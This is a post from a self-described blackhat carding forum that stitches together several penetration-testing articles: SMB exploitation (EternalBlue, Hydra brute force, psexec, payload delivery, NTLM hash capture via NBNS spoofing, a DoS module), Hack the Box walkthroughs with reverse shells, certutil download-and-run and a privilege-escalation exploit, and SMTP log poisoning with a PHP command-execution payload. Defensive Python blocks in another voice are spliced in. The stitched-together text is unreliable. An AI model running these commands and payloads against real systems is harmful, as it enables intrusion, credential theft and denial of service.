Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc

[Guide] How to SMB Penetration Testing (Port 445)
In this article, we will learn how to gain control over our victim’s PC through the SMB port. There are various ways to do it, so let us take the time to learn all of them, because different circumstances call for different measures.
Table of Contents
Introduction to SMB Protocol
  • Working of SMB
  • Versions of Windows SMB
  • SMB Protocol Security
SMB Enumeration
Scanning Vulnerability
Multiple Ways to Exploit SMB
  • Eternal Blue
  • SMB login via Brute Force
  • PSexec to connect SMB
  • Rundll32 One-liner to Exploit SMB
  • SMB Exploit via NTLM Capture
SMB DOS-Attack
Post Exploitation
File Sharing
  • smbserver
  • smbclient
Introduction to SMB Protocol
Server Message Block (SMB), one dialect of which was known as the Common Internet File System (CIFS), operates as an application-layer network protocol for file sharing that allows applications on a computer to read and write files and to request services from server programs in a computer network. The SMB protocol can be used on top of TCP/IP or other network protocols. Using the SMB protocol, an application (or the user of an application) can access files or other resources on a remote server. This allows applications to read, create, and update files on the remote server. It can also communicate with any server program that is set up to receive an SMB client request.
Working of SMB
SMB functions as a request-response or client-server protocol. The only time the protocol does not work in a request-response framework is when a client requests an opportunistic lock (oplock) and the server has to break an existing oplock because the requested mode is incompatible with the existing oplock. Client computers using SMB connect to a supporting server using NetBIOS over TCP/IP, IPX/SPX, or NetBEUI. Once the connection is established, the client computer or program can open, read/write, and access files much like on the local file system.
Versions of Windows SMB
CIFS: The old version of SMB, which was included in Microsoft Windows NT 4.0 in 1996.
SMB 1.0 / SMB1: The version used in Windows 2000, Windows XP, Windows Server 2003 and Windows Server 2003 R2.
SMB 2.0 / SMB2: This version is used in Windows Vista and Windows Server 2008.
SMB 2.1 / SMB2.1: This version is used in Windows 7 and Windows Server 2008 R2.
SMB 3.0 / SMB3: This version is used in Windows 8 and Windows Server 2012.
SMB 3.02 / SMB3: This version is used in Windows 8.1 and Windows Server 2012 R2.
SMB 3.1: This version is used in Windows Server 2016 and Windows 10.
Presently, the latest version of SMB is the SMB 3.1.1 which was introduced with Windows 10 and Windows Server 2016. This version supports AES 128 GCM encryption in addition to AES 128 CCM encryption added in SMB3, and implements pre-authentication integrity check using SHA-512 hash. SMB 3.1.1 also makes secure negotiation mandatory when connecting to clients using SMB 2.x and higher.
SMB Protocol Security
The SMB protocol supports two levels of security. The first is the share level: the server is protected at this level and each share has a password. The client computer or user has to enter the password to access data or files saved under the specific share. This is the only security model available in the Core and Core Plus SMB protocol definitions. User-level protection was later added to the SMB protocol. It is applied to individual files, and each share is based on specific user access rights. Once a server authenticates the client, he/she is given a unique identification (UID) that is presented upon access to the server. The SMB protocol has supported individual security since LAN Manager 1.0 was implemented.
SMB Enumeration
To identify the following information about a Windows or Samba system, every pentester goes for SMB enumeration during network penetration testing.
  • Banner Grabbing
  • RID cycling
  • User listing
  • Listing of group membership information
  • Share enumeration
  • Detecting if a host is in a workgroup or a domain
  • Identifying the remote operating system
  • Password policy retrieval
Here you can observe that we are using nmap, the most famous network scanning tool, for SMB enumeration.
nmap -p 445 -A 192.168.1.101

As a result, we enumerated the following information about the target machine:
Operating System: Windows 7 ultimate
Computer Name & NetBIOS Name: Raj
SMB security mode: SMB 2.02
There are so many automated scripts and tools available for SMB enumeration; if you want to know more about SMB enumeration, read this article: “[link visible only to registered members]”.

[Image: 1.png?w=687&ssl=1]
Scanning Vulnerability
During the enumeration phase we generally go for banner grabbing to identify the version of the running service and the host operating system. Once you have enumerated this information, move on to the vulnerability scanning phase to identify whether the installed service is a vulnerable version or a patched one.
Nmap provides various scripts to identify the vulnerability state of specific services; similarly, it has built-in scripts for SMB that identify its vulnerable state for the given target IP.
nmap --script smb-vuln* -p 445 192.168.1.101

As a result, it shows that the target machine is highly vulnerable to MS17-010 (EternalBlue) because SMBv1 is enabled.
To know more about MS17-010, read the complete article “[link visible only to registered members]”.

[Image: 2.png?w=687&ssl=1]
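A defender triaging the output of the scan above wants the vulnerable hosts pulled out of the text automatically rather than read off a screenshot. The Python below is an added example, not code from the original article or from Nmap: it parses scan text laid out the way Nmap's vulns library prints script results (the sample output is constructed for the demonstration, not copied from the page) and lists the hosts whose smb-vuln checks report a VULNERABLE state, which for ms17-010 means SMBv1 is still enabled and the patch is missing.

```python
import re

# Constructed sample shaped like `nmap --script smb-vuln* -p 445` output. Only
# the ms17-010 block carries a State line, as nmap's vulns library reports
# non-vulnerable checks only when asked to. Not the page's screenshot.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.1.101
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|_    Risk factor: HIGH

Nmap scan report for 192.168.1.102
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
"""

# "Nmap scan report for 10.0.0.5" or "Nmap scan report for name (10.0.0.5)"
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?")
SCRIPT_RE = re.compile(r"^\|_?\s*(smb-vuln-[\w-]+):")
STATE_RE = re.compile(r"^\|_?\s+State:\s*(\S+)")


def parse_smb_vuln_scan(text):
    """Return {host_ip: {script_name: state}} from nmap smb-vuln* output.
    Scripts that print no State line are omitted for that host."""
    report, host, script = {}, None, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host, script = m.group(1), None
            report[host] = {}
            continue
        if host is None:
            continue
        m = SCRIPT_RE.match(line)
        if m:
            script = m.group(1)
            continue
        m = STATE_RE.match(line)
        if m and script:
            # nmap may print "VULNERABLE (Exploitable)"; keep the first token.
            report[host][script] = m.group(1)
    return report


def hosts_needing_patch(report):
    """Hosts where any smb-vuln script reported a VULNERABLE state. For
    ms17-010 the fix is the MS17-010 update plus disabling SMBv1."""
    return sorted(h for h, checks in report.items()
                  if any(s.startswith("VULNERABLE") for s in checks.values()))


if __name__ == "__main__":
    found = parse_smb_vuln_scan(SAMPLE_SCAN)
    for host, checks in found.items():
        print(host, checks or "no vulnerable state reported")
    print("patch first:", hosts_needing_patch(found))
```

Feed it the saved text of a real scan (`nmap -oN` output has the same layout) and the returned list is the patch queue; hosts with an empty dict were scanned but reported nothing.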
Multiple Ways to Exploit SMB
Eternal Blue
As we know it is vulnerable to MS17-010 and we can use Metasploit to exploit this machine. Therefore we run the following module which will directly exploit the target machine.
use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.101
msf exploit(ms17_010_eternalblue) > exploit

Boom!! We have successfully accessed the remote machine's shell, as shown in the image below.
[Image: 3.png?w=687&ssl=1]
SMB login via Brute Force
If you fail to enumerate a vulnerable state of SMB, or find a patched version of SMB on the target machine, then brute force is another option to gain unauthorized access to the remote machine.
Here we only need two dictionaries, one containing a list of usernames and one containing a list of passwords, and a brute-force tool to run the attack.
hydra -L user.txt -P pass.txt 192.168.1.101 smb

-L –> denotes the path of the username list
-P –> denotes the path of the password list
Once the command is executed it starts the dictionary attack, so you will have the right username and password in no time. After a few minutes Hydra cracks the credential; as you can observe, we successfully grabbed the SMB username raj and password 123.
To know more about it, read the complete article here: “[link visible only to registered members]”.
[Image: 4.png?w=687&ssl=1]
If you have SMB login credential, then you can use the following module to determine what local users exist via the SAM RPC service.
use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(smb_enumusers) > set rhosts 192.168.1.101
msf auxiliary(smb_enumusers) > set smbuser raj
msf auxiliary(smb_enumusers) > set smbpass 123
msf auxiliary(smb_enumusers) > exploit


[Image: 5.png?w=687&ssl=1]
PSexec – To Connect SMB
Once you have the SMB login credentials of the target machine, the following Metasploit module gives you a meterpreter session to access the remote shell.
use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > set rhost 192.168.1.101
msf exploit(windows/smb/psexec) > set smbuser raj
msf exploit(windows/smb/psexec) > set smbpass 123
msf exploit(windows/smb/psexec) > exploit

Once the commands run you will gain a meterpreter session on your victim’s PC and can access it as you want.
There are so many scripts and tools available to connect to a remote machine using the SMB protocol; we have already written an article on connecting to SMB in multiple ways. Read the complete article here: “[link visible only to registered members]”.

[Image: 6.png?w=687&ssl=1]
Rundll32 One-liner to Exploit SMB
This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads. It currently supports DLLs and PowerShell.
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit

This will generate a link to the malicious DLL file; now send this link to your target and wait for their action.
[Image: 7.1.png?w=687&ssl=1]
As soon as the victim runs the above malicious code inside the Run prompt or command prompt, we get a meterpreter session in Metasploit.
[Image: 7.2.png?w=687&ssl=1]
SMB Exploit via NTLM Capture
Another method to exploit SMB is NTLM hash capture, by capturing the challenge-response password hashes of the SMB target machine.
This module provides an SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the Ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module.
use auxiliary/server/capture/smb
msf auxiliary(smb) > set srvhost 192.168.1.109
msf auxiliary(smb) > set johnpwfile /root/Desktop/
msf auxiliary(smb) > exploit

Simultaneously, run the nbns_response module alongside the capture/smb module.
This module forges the NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests sent to the local subnet’s broadcast address and spoof a response, redirecting the querying machine to an IP of the attacker’s choosing. Combined with auxiliary/server/capture/smb or auxiliary/server/capture/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and will bind to udp/137 on all interfaces.
use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > set spoofip 192.168.1.109
msf auxiliary(nbns_response) > set interface eth0
msf auxiliary(nbns_response) > exploit

As a result, this module produces a fake Windows security prompt on the victim’s system when it tries to establish a connection with another system in order to access that system’s shared folders.
[Image: 7.png?w=687&ssl=1]
We used nmap UDP and TCP port scanning to identify open ports and protocols; from the given image you can observe that port 137 is open for the NetBIOS name service on our local machine.
[Image: 8.png?w=687&ssl=1]
Now when the victim tries to access our shared folder, he connects to us through his network IP; the image given below demonstrates that the victim is connecting to the malicious IP 192.168.1.109. When the victim tries to access the shared folder, he is trapped by the fake Windows security alert prompt, which asks him to enter his username and password to access the shared folders.
[Image: 9.png?w=687&ssl=1]
Awesome!! Once again the attacker has captured the NTLMv2 hash; from the given image you can see that here also the attacker has captured:
Username: raj
[Image: 10.png?w=687&ssl=1]
Now use John the Ripper to crack the NTLMv2 hash by executing the command given below:
john john_smb_netntlmv2

From the image given below you can confirm that we successfully retrieved the password: 123 for user: pentest by cracking the NTLMv2 hash.
To know more about it, read the complete article here: “[link visible only to registered members]”.
[Image: 11.png?w=687&ssl=1]
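The nbns_response module works because a Windows host that cannot resolve a name accepts whatever NBNS reply arrives on udp/137 for it, so the module answers every broadcast query with the attacker's address. The Python below is an added example, not code from the original article or from Metasploit: it builds a positive NBNS name-query response in the RFC 1002 layout (the packet bytes are constructed here), decodes the first-level-encoded NetBIOS name and the answer address, and runs a defender-side check that flags answers for names no inventoried host owns, or that point a known name at an unexpected IP. The inventory and the packet sources are assumptions made for the demonstration.

```python
import ipaddress
import struct

NB_TYPE = 0x0020  # NetBIOS general name service RR type (RFC 1002)


def encode_netbios_name(name, suffix=0x20):
    """First-level encoding (RFC 1001 s14.1): pad the name to 15 bytes, append the
    one-byte suffix (0x20 = file server service), then write every byte as two
    letters, 'A' + high nibble and 'A' + low nibble."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    return b"".join(bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)]) for b in raw)


def decode_netbios_name(encoded):
    """Inverse of encode_netbios_name; returns (name, suffix)."""
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(), raw[15]


def build_nbns_response(name, ip, txid=0x1234, ttl=300):
    """Constructed positive name query response: 12-byte header (response and
    authoritative flags, one answer), then one NB resource record whose RDATA is
    NB_FLAGS (2 bytes) followed by the IPv4 address the name supposedly owns."""
    label = bytes([32]) + encode_netbios_name(name) + b"\x00"
    header = struct.pack(">HHHHHH", txid, 0x8500, 0, 1, 0, 0)
    rdata = struct.pack(">H", 0x0000) + ipaddress.IPv4Address(ip).packed
    rr = label + struct.pack(">HHIH", NB_TYPE, 0x0001, ttl, len(rdata)) + rdata
    return header + rr


def _skip_name(pkt, off):
    """Advance past a DNS-style name (labels or a compression pointer)."""
    while True:
        n = pkt[off]
        if n == 0:
            return off + 1
        if n & 0xC0 == 0xC0:
            return off + 2
        off += n + 1


def parse_nbns_response(pkt):
    """Return {'txid', 'name', 'suffix', 'answers'} for an NBNS response carrying
    NB records, or None for queries, truncated data and other record types."""
    if len(pkt) < 12:
        return None
    txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    if not flags & 0x8000 or an == 0:
        return None
    off = 12
    for _ in range(qd):                      # skip question entries, if any
        off = _skip_name(pkt, off) + 4
    name = suffix = None
    answers = []
    for _ in range(an):
        start = off
        off = _skip_name(pkt, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
        off += 10
        rdata = pkt[off:off + rdlen]
        off += rdlen
        if rtype != NB_TYPE or pkt[start] != 32:
            continue
        name, suffix = decode_netbios_name(pkt[start + 1:start + 33])
        for i in range(0, rdlen - 5, 6):     # RDATA is a list of (NB_FLAGS, IPv4)
            answers.append(str(ipaddress.IPv4Address(rdata[i + 2:i + 6])))
    return {"txid": txid, "name": name, "suffix": suffix, "answers": answers}


def flag_spoofed_responses(packets, inventory):
    """Defender-side check over (source_ip, udp_payload) pairs: an NBNS answer
    is suspicious when it resolves a name no inventoried host owns (what a
    poisoner does for every name it hears) or points a known name elsewhere."""
    alerts = []
    for src, pkt in packets:
        parsed = parse_nbns_response(pkt)
        if parsed is None:
            continue
        expected = inventory.get(parsed["name"])
        for ip in parsed["answers"]:
            if expected is None:
                alerts.append((src, parsed["name"], ip, "name not in inventory"))
            elif ip != expected:
                alerts.append((src, parsed["name"], ip, f"expected {expected}"))
    return alerts


if __name__ == "__main__":
    # Constructed traffic: one legitimate reply, then two replies of the kind an
    # NBNS spoofer sends (every name answered with its own address).
    inventory = {"FILESRV": "192.168.1.10"}
    traffic = [
        ("192.168.1.10", build_nbns_response("FILESRV", "192.168.1.10")),
        ("192.168.1.109", build_nbns_response("FILESRV", "192.168.1.109")),
        ("192.168.1.109", build_nbns_response("NOSUCHHOST", "192.168.1.109")),
    ]
    for alert in flag_spoofed_responses(traffic, inventory):
        print("suspicious NBNS answer:", alert)
```

In practice the packets come from a sniffer on udp/137; querying a name that deliberately does not exist and alerting on any answer is the simplest form of this check, and on networks that do not need NetBIOS name resolution at all, disabling NetBIOS over TCP/IP removes the attack surface entirely.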
SMB DOS-Attack
An SMB DoS attack is another excellent method we have in the Metasploit framework.
This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and force a vulnerable client to access the IP of this system as an SMB server. This can be accomplished by embedding a UNC path (\\HOST\share\something) into a web page if the target is using Internet Explorer, or into a Word document otherwise.
use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
msf auxiliary(ms10_006_negotiate_response_loop) > set srvhost 192.168.1.106
msf auxiliary(ms10_006_negotiate_response_loop) > exploit

Now, when the victim tries to access the shared folder through our malicious IP, the target machine crashes; this attack is very effective.
[Image: 13.png?w=687&ssl=1]
Post Exploitation
This module will enumerate configured and recently used file shares.
use post/windows/gather/enum_shares
msf post(enum_shares) > set session 1
msf post(enum_shares) > exploit

As you can observe, here it has shown three UNC paths that have been entered in the Run dialog.
[Image: 17.png?w=687&ssl=1]
File Sharing
smbserver.py
Now we will use a Python script that activates an SMB service on our Linux machine. This is useful in the situation where the target machine does NOT have a writeable share available. You can visit “[link visible only to registered members]” for this Python script.
I copied the Python code from GitHub and pasted it into a text file as smbserver.py in the Desktop folder. Now execute the command given below to share the folder “raj”.
[Image: 18.png?w=687&ssl=1]
Since we know the SMB service is running on host 192.168.1.108, from a Windows machine we can access its shared folder through the Run prompt.
[Image: 19.png?w=687&ssl=1]
Hence you can observe that we successfully accessed the folder “raj” and found two text files, user and pass, in it. In this way we can use the SMB Python script for sharing files between Windows and Linux machines.
[Image: 20.png?w=687&ssl=1]
Smbclient
smbclient is a client that can ‘talk’ to an SMB/CIFS server. It offers an interface similar to that of the FTP program. Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on.
smbclient -L 192.168.1.108

[Image: 21.png?w=687&ssl=1]
smbclient //192.168.1.108/raj

As you can observe, with the help of smbclient we are able to view the shared folder of the victim’s machine. Moreover, we can use smbclient for sharing a file on the network. Here you can observe that we logged in successfully using the raj:123 login and transferred the user.txt file.
[Image: 22.png?w=687&ssl=1]

Today we are going to solve another CTF challenge, “Fighter”. It is a retired vulnerable lab presented by Hack the Box to help pentesters perform online penetration testing according to their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Fighter is 10.10.10.72
Penetrating Methodology
  • Network scanning (Nmap)
  • Browsing IP address through HTTP
  • Adding Domain name to /etc/hosts
  • Bruteforcing subdomains
  • Adding new domain name to /etc/hosts
  • RCE using SQL injection
  • Upgrading shell to meterpreter session
  • Finding vulnerable service
  • Editing Exploit to bypass OS check
  • Finding root.exe
  • Reversing program to find the password
  • Creating a C-program to find the password
  • Getting the root flag
Walkthrough
Let’s start off with our basic nmap command to find out the open ports and services.
nmap -sV -sC -T4 10.10.10.72

[Image: 1.png?w=687&ssl=1]
The Nmap output shows us that there is only 1 port open: 80(HTTP)
[Image: 2.png?w=687&ssl=1]
We find that port 80 is running http, so we open the IP in our browser.
In the homepage, we find the Domain name “streetfighterclub.htb”. We add the domain to our /etc/hosts file.
[Image: 3.png?w=687&ssl=1]
We don’t find anything new on the webpage, but looking further into it we find that there might be subdomains available that will give us more clues. We intercept the request and send it to Intruder, then select the position where we want to brute force the request.
[Image: 4.png?w=687&ssl=1]
We select the wordlist; we use namelist.txt located in /usr/share/dnsrecon/.
[Image: 5.png?w=687&ssl=1]
After bruteforcing, we find a subdomain called “members.streetfighterclub.htb” that gave HTTP code 403.
[Image: 6.png?w=687&ssl=1]
We add the subdomain in /etc/hosts so that we can access the web site.
[Image: 7.png?w=687&ssl=1]
We open the webpage and get a 403 Forbidden error.
[Image: 8.png?w=687&ssl=1]
We now run a dirb scan on members.streetfighterclub.htb and find a directory called “old”.
dirb [URL visible only to registered members]

[Image: 9.png?w=687&ssl=1]
We then find web pages inside that directory. As we know it is an IIS server, we look for “asp” files on the web server and find a page called “login.asp”.
dirb [URL visible only to registered members] -X .asp

[Image: 10.png?w=687&ssl=1]
We open the web page and find a login page.
[Image: 11.png?w=687&ssl=1]
We enumerate the webpage and find that the web application is vulnerable to SQL injection. We find a username, password and e-mail but are unable to log in. So we try command injection using SQL injection; we referred to this “[link visible only to registered members]”.

[Image: 13.png?w=687&ssl=1]
We set up our listener and got a reverse shell.
nc -lvp 80

[Image: 14.png?w=687&ssl=1]
We are not able to find anything on the target machine. So we try to convert our shell into meterpreter, but are unable to run any exe file: there was a firewall that didn’t allow us to run any exe file. We got a reference through a link on how to bypass this. We use nps payload to create an XML file that will contain our payload (download from “[link visible only to registered members]”).

[Image: 15.png?w=687&ssl=1]
We move into “c:\users\sqlserv” as we have a shell as user sqlserv.
[Image: 16.png?w=687&ssl=1]
We run the command provided by nps payload to start our listener.
msfconsole -r msbuild_nps.rc

[Image: 17.png?w=687&ssl=1]
We start our python HTTP Server to send our file to the target machine.
python -m SimpleHTTPServer 80

[Image: 19.png?w=687&ssl=1]
We download the file using certutil.exe on the target machine.
certutil.exe -urlcache -split -f [URL visible only to registered members] msbuild_nps.xml

[Image: 20.png?w=687&ssl=1]
We then run the XML file we uploaded using msbuild.exe.
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe msbuild_nps.xml

[Image: 21.png?w=687&ssl=1]
As soon as we run the file we get a meterpreter session. As we can see by running sysinfo we have a 32-bit meterpreter session on a 64-bit machine.
[Image: 22.png?w=687&ssl=1]
To convert it into 64-bit session, we check the processes and find the 64-bit running process. We then migrate our process to a 64-bit process and get a 64-bit session.
meterpreter > ps
meterpreter > migrate 2320


[Image: 23.png?w=687&ssl=1]
We still don’t find anything to escalate our privilege. As this machine is themed on the Street Fighter game, we google for Street Fighter exploits and find that Street Fighter V has a privilege escalation vulnerability. We find that Street Fighter has a service called Capcom, so we check whether Street Fighter V is installed on the target machine.
sc query capcom

[Image: 24.png?w=687&ssl=1]
We find this Metasploit exploit “[link visible only to registered members]”; we try to run it but are unable to get a shell, as it gives an error stating that the system is not vulnerable. So we make changes to the code and comment out the section where it checks the OS version.

[Image: 25.png?w=687&ssl=1]
Now we are successfully able to run the exploit.
msf > use exploit/windows/local/capcom_sys_exec
msf exploit(windows/local/capcom_sys_exec) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/capcom_sys_exec) > set lhost tun0
msf exploit(windows/local/capcom_sys_exec) > set lport 80
msf exploit(windows/local/capcom_sys_exec) > set session 2
msf exploit(windows/local/capcom_sys_exec) > run

[Image: 26.png?w=687&ssl=1]
When we check the uid we find that we are successfully able to get administrative rights.
[Image: 27.png?w=687&ssl=1]
We enumerate the directories to find the flags and inside “c:\users\decoder\Desktop”, we find a file called “user.txt”. When we take look at the content of the file we find our first flag.
[Image: 28.1.png?w=687&ssl=1]
We move into c:\users\Administrator\Desktop and find a file called “root.exe”. We run it and find that it asks for a password. There is also a DLL file called “checkdll.dll”; the password might be checked using this DLL file.
[Image: 28.png?w=687&ssl=1]
We download both the files into our system using meterpreter.
download root.exe /root/Desktop
download checkdll.dll /root/Desktop


[Image: 29.png?w=687&ssl=1]
We reverse engineer them using IDA and find that this program XORs 9 with each character of the variable aFmFeholH. Analyzing with IDA tells us that the variable contains “Fm[content hidden by the forum for unregistered users]fEhO1}h”.
[Image: 31.png?w=687&ssl=1]
We compile and run the file and get the password to be “OdioLaFeta”.
[Image: 32.png?w=687&ssl=1]
When we provide the password to the root.exe we get our final flag.
[Image: 33.png?w=687&ssl=1]

In this post, we will be discussing SMTP log poisoning. But before getting into the details, kindly read our previous articles “[link visible only to registered members]” and “Beginner Guide to File Inclusion Attack (LFI/RFI)”. Today you will see how we can exploit a web server by abusing SMTP services if the web server is vulnerable to local file inclusion.

Let’s Start!!
With the help of Nmap we scan for port 25, and as a result it shows that port 25 is open for the SMTP service.
nmap -p25 192.168.1.107

[Image: 1.png?w=687&ssl=1]
This attack is truly based on the Local File Inclusion attack; therefore I took help from our previous “[link visible only to registered members]”, where I created a PHP file that allows the user to include a file through the file parameter.

As a result, you can observe that we are able to access /etc/passwd file of the victim machine.
[Image: 2.png?w=687&ssl=1]
Now, if you are able to access the mail.log file through the LFI, it means the mail.log file has read and write permission, and hence we can infect the log file by injecting malicious code.
[Image: 4.png?w=687&ssl=1]
Now let’s try to enumerate further and connect to the SMTP port (25).
telnet 192.168.1.107 25

As we can see, we connected to the victim machine successfully. Now let’s try to send a mail via the command line (CLI) of this machine and send the OS commands via the “RCPT TO” option, since the mail.log file generates a log entry for every mail when we connect to the web server. Taking advantage of this feature, I will now send malicious PHP code as the fake user, and it will be added automatically to the mail.log file as a new log entry.
MAIL FROM:<[sender address hidden on the original page]>
RCPT TO:<?php system($_GET['c']); ?>

[Image: 5.png?w=687&ssl=1]
Note: We can ignore the “501 5.1.3 Bad recipient address syntax” server response seen in the above screenshot, because ideally the internal email program of the server (victim machine) is expecting us to input an email ID and not OS commands.
Our goal is to inject PHP code into the logs; this stage is called log file poisoning. We can clearly see the details of mail.log as well as execute the command given through the c parameter. Now execute ifconfig as the command to verify the network interface and confirm its result in the given screenshot.
192.168.1.107/lfi/lfi.php?file=/var/log/mail.log&c=ifconfig

You can observe its output in its source code as shown in the below image:
[Image: 6.png?w=687&ssl=1]
This technique is known as SMTP log poisoning and through such type of vulnerability, we can easily take the reverse shell of the victim’s machine.
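The root cause on the web side is an include that hands the ?file= parameter straight to the filesystem; the SMTP side only supplies a file the attacker can write to. The Python below is an added example, not the article's PHP and not code from any project: it contrasts that unrestricted behaviour with a confined include (the include root and the allowed extensions are assumptions made for the demonstration) and adds a log check that spots PHP open tags in mail.log lines, which is exactly what the RCPT TO injection above leaves behind. The log lines are constructed in Postfix's shape, not taken from the page's screenshot.

```python
import posixpath
import re

# Assumed layout for the demonstration (hypothetical paths, not from the page):
# the application may only include files below INCLUDE_ROOT.
INCLUDE_ROOT = "/var/www/html/lfi/pages"
ALLOWED_SUFFIXES = {".php", ".html"}


def unrestricted_include_path(param):
    """What the page's lfi.php does with ?file=: the parameter is used as-is,
    so /etc/passwd and /var/log/mail.log are as includable as any page."""
    return param


def safe_include_path(param, root=INCLUDE_ROOT):
    """Confined include: no NUL bytes, no absolute paths or stream wrappers,
    an extension allow-list, and a containment check on the normalised path."""
    if "\x00" in param:
        raise ValueError("NUL byte in path")
    if param.startswith(("/", "\\")) or re.match(r"^[a-z][a-z0-9+.-]*:", param, re.I):
        raise ValueError("absolute path or URL/stream wrapper")
    if posixpath.splitext(param)[1].lower() not in ALLOWED_SUFFIXES:
        raise ValueError("extension not allowed")
    full = posixpath.normpath(posixpath.join(root, param))
    if posixpath.commonpath([root, full]) != root:
        raise ValueError("outside include root")
    return full


def is_allowed_include(param, root=INCLUDE_ROOT):
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        safe_include_path(param, root)
        return True
    except ValueError:
        return False


# Constructed mail.log lines in Postfix's shape. The second line is what the
# RCPT TO injection leaves behind: the server rejects the address (501 5.1.3)
# but still writes it to the log verbatim.
SAMPLE_MAIL_LOG = """\
Oct  3 10:12:01 victim postfix/smtpd[1201]: connect from unknown[192.168.1.109]
Oct  3 10:12:20 victim postfix/smtpd[1201]: NOQUEUE: reject: RCPT from unknown[192.168.1.109]: 501 5.1.3 Bad recipient address syntax; from=<[email protected]> to=<<?php system($_GET['c']); ?>> proto=SMTP helo=<x>
Oct  3 10:13:05 victim postfix/smtpd[1201]: disconnect from unknown[192.168.1.109]
"""

PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
CLIENT_RE = re.compile(r"from \S+?\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def find_poisoned_log_lines(log_text):
    """Return (line_number, client_ip) for every line carrying a PHP open tag.
    In mail.log such tags can only arrive through attacker-controlled SMTP
    fields (HELO, MAIL FROM, RCPT TO), so every hit is worth an alert."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        if PHP_TAG_RE.search(line):
            m = CLIENT_RE.search(line)
            hits.append((lineno, m.group(1) if m else None))
    return hits


if __name__ == "__main__":
    for p in ["about.php", "/var/log/mail.log", "../../config.php"]:
        print(f"{p!r}: unrestricted -> {unrestricted_include_path(p)}, "
              f"confined -> {'allowed' if is_allowed_include(p) else 'rejected'}")
    print("poisoned log lines:", find_poisoned_log_lines(SAMPLE_MAIL_LOG))
```

The containment check is what matters: rejecting `..` by string matching is easy to get wrong, whereas normalising the joined path and confirming it still lives under the root catches every traversal spelling at once. The log check is a cheap detection to run over mail.log on any host that also serves PHP.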
Execute the following commands inside Metasploit:
use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 1
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.109
msf exploit(web_delivery) > set lport 8888
msf exploit(web_delivery) > exploit

Copy the highlighted text shown in the window below.
[Image: 7.png?w=687&ssl=1]
Paste the copied malicious code into the URL as shown in the given image and execute it as the command.
[Image: 8.png?w=687&ssl=1]
When the above code gets executed you will get meterpreter session 1 on the targeted web server.
msf exploit(web_delivery) > sessions 1
meterpreter > sysinfo

[Image: 9.png?w=687&ssl=1]

Today we are going to solve another CTF challenge, “Mischief”. Mischief is a retired vulnerable lab presented by Hack the Box to help pentesters perform online penetration testing according to their experience; they have a collection of vulnerable labs as challenges, from beginner to expert level.
Level: Easy
Task: To find user.txt and root.txt file
Penetration Methodologies
Scanning Network
  • TCP and UDP ports scanning (Nmap)
Enumeration
  • SNMP Service Enumeration (Nmap Script)
  • Obtain credential for port 3366 login
  • Identify IPv6 address (ENYX)
  • Scanning Ipv6 (Nmap)
Access Victim’s Shell
  • Abusing web server through the Command Execution Panel
  • Obtain reverse Shell via ncat
  • Get user.txt flag
Privilege Escalation
  • Obtain root password from bash_history
  • Find root.txt flag
Scanning Network
Note: Since these labs are online available therefore they have a static IP. The IP of this lab is 10.10.10.92
Let’s start off with our nmap Aggressive scan to find out the open ports and services.
nmap -A 10.10.10.92

[Image: 1.png?w=687]
But as you can observe, here we didn’t obtain much information; therefore I further scanned the UDP ports, and from the result we found that port 161 is open for SNMP.
nmap -sU 10.10.10.92

Enumeration
Because we knew the SNMP service was enabled on the network, I ran the nmap script for SNMP enumeration.
nmap -p161 -sC -sV -sU 10.10.10.92

[Image: 3.png?w=687]
Hmmm!! So here I found something very interesting; it looks like the login credential to be used for authentication to connect to port 3366.
[Image: 4.png?w=687]
Let’s navigate to port 3366 in the web browser and enter the following credentials.
Username: loki
Password: godofmischiefisloki

[Image: 5.png?w=687]
Here we were welcomed by the following web page, which held another credential. Let’s dig out another way to utilize this credential for login.
[Image: 6.png?w=687]
